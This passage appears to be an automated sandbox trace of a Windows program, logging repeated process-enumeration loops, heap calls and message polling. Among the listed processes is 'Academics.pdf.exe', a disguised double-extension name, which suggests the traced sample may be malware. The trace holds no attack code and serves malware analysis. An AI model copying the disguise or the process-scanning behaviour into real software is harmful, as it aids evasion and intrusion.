szExeFile="sansruled.exe")) returned 1 [0304.612] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0304.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0304.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0304.614] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0304.615] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0304.616] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0304.617] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0304.617] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0304.618] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0304.619] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0304.620] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0304.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.622] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.624] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0304.625] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.626] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0304.626] CloseHandle (hObject=0x294) returned 1 [0304.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.627] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.627] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0304.630] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.630] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.632] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.633] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.634] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.637] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.638] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.639] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.640] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0304.641] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.641] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.642] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.643] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.644] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.647] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.648] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.650] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0304.651] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0304.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0304.653] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0304.654] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0304.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0304.656] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0304.657] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0304.658] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0304.659] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0304.660] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0304.661] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0304.662] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0304.662] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0304.663] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0304.664] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0304.665] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0304.666] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0304.667] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0304.668] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0304.669] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.669] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.670] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.671] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0304.673] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.674] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0304.675] CloseHandle (hObject=0x294) returned 1 [0304.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.675] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.675] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.675] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.676] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0304.676] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0304.677] 